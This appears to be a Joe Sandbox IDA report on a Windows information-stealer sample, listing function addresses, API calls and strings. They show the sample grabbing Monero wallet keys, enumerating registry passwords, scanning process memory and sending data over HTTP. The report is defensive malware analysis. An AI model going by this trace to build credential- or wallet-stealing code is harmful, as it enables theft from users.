Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,04330750), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,043307A0), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04330780,?,043387A0,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

J&f, xrefs: 004047A5
------, xrefs: 0040467D
", xrefs: 004048B2
------, xrefs: 00404929
", xrefs: 004049F3
------, xrefs: 004047E8

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$J&f
API String ID: 460715078-2398766951
Opcode ID: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 7cda8d5521d99cf19aaaaf71ff52ec70d860003ad009979284783f799879de92
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,04332E78,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40
?, xrefs: 00414B17

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: f99f990ee98b2c87e49eb54a0476dff1419a0cb08dcebe01bba17a831a97a86a
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 3c0a368077967c4d6cb00d96c460f66b96e072591d38366c86bc8a63ce48f73f
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Strings

\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
.keys, xrefs: 0040132B

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 55317b6d737fdd9b0cce10d4996af803ea1c6e882ae9976ce4a7b1677b3be5f7
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(30AA7020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(30AA7020,00000000), ref: 00407018
lstrcat.KERNEL32(30AA7020, : ), ref: 0040702A
lstrcat.KERNEL32(30AA7020,00000000), ref: 0040705F
lstrcat.KERNEL32(30AA7020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(30AA7020,00000000), ref: 004070A3
lstrcat.KERNEL32(30AA7020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

h0A, xrefs: 00406FA6, 00406FA9
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2
: , xrefs: 0040701E

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 1bad08d2076e3e89f4364c8d83dbdbb36a614798d25560e064741be9e1e65df2
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: 404b0b46b206b3bf4871344594db70cb3467a452f73d0affe24fd8bd6f785462
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74
c.A, xrefs: 00404CC1, 00404DA0

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: b883753fc3e69b7f41e944ae3663d1622002b5338cc9304bc8ff2cb9a4e93150
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

:, xrefs: 004141F9
C, xrefs: 004141E9
\, xrefs: 004141FD

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 00409426, 00409449, 00409429, 0040946F
'@, xrefs: 004093C3, 00409486

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: ade6bf95ff6b3192d7b4b22adc4c9fce4594f25298dc92e23d3df2276528e089
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04336810,00000000,?,0041D774,00000000,?,00000000,00000000,?,043368D0), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,04330750), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 2c33a23298cca61dfdaeee40ce65a6995c68276a218cce1f1fd24f42d4950647
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
